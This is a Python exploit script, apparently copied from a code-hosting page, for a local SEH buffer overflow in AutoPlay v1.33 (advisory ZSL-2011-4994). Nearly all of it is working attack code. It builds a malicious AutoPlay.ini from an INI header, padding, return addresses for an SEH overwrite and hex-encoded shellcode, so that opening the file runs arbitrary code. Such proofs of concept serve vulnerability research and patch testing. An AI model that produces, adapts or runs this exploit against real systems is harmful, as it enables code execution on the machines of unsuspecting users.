86 lines
No EOL
3.5 KiB
Python
Executable file
86 lines
No EOL
3.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
#
|
|
# AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)
|
|
#
|
|
#
|
|
# Vendor: Naugher Software
|
|
# Product web page: http://www.naughter.com
|
|
# Affected version: 1.33
|
|
#
|
|
# Summary: AutoPlay is a shareware application used for making
|
|
# autorun.ini files that can be edited and stored to compact disks.
|
|
#
|
|
# Desc: The program suffers from a buffer overflow vulnerability
|
|
# when openinng autorun file (.ini), as a result of adding extra
|
|
# bytes to parts of the edited file, giving the atackers the
|
|
# possibility for an arbitrary code execution on the affected
|
|
# system. Also the buffer overflow vulnerability allows the
|
|
# atacker to bypass Structured Exception Handling (SEH)
|
|
# protection mechanism.
|
|
#
|
|
# Tested on: Microsoft Windows 7 Ultimate
|
|
#
|
|
# Vulnerability discovered by: badc0re (Dame Jovanoski)
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2011-4994
|
|
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php
|
|
#
|
|
#
|
|
# 13.02.2011
|
|
#
|
|
|
|
|
|
from struct import *
|
|
import time
|
|
f=open('AutoPlay.ini','w')
|
|
|
|
shell=('\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61'
|
|
'\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13'
|
|
'\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f'
|
|
'\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b'
|
|
'\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30'
|
|
'\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72'
|
|
'\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd'
|
|
'\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e'
|
|
'\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52'
|
|
'\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56');
|
|
|
|
head=('\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65'
|
|
'\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61'
|
|
'\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64'
|
|
'\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70'
|
|
'\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70'
|
|
'\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c'
|
|
'\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d'
|
|
'\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e'
|
|
'\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37'
|
|
'\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d'
|
|
'\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d'
|
|
'\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d'
|
|
'\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a'
|
|
'\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43'
|
|
'\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e'
|
|
'\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d'
|
|
'\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a'
|
|
'\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d'
|
|
'\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30'
|
|
'\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c'
|
|
'\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61'
|
|
'\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77'
|
|
'\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74'
|
|
'\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d'
|
|
'\x65\x3d')
|
|
|
|
junk='\x41'*32
|
|
junk1='\x41'*92
|
|
nseh='\xeb\x06\x90\x90'
|
|
seh='\x62\xce\x86\x7c' # pop pop ret
|
|
esp='\x7b\x46\x86\x7c' # jmp esp
|
|
try:
|
|
f.write(head+junk+esp+junk1+nseh+seh+shell)
|
|
f.close()
|
|
print('File created')
|
|
except:
|
|
print('File cannot be created') |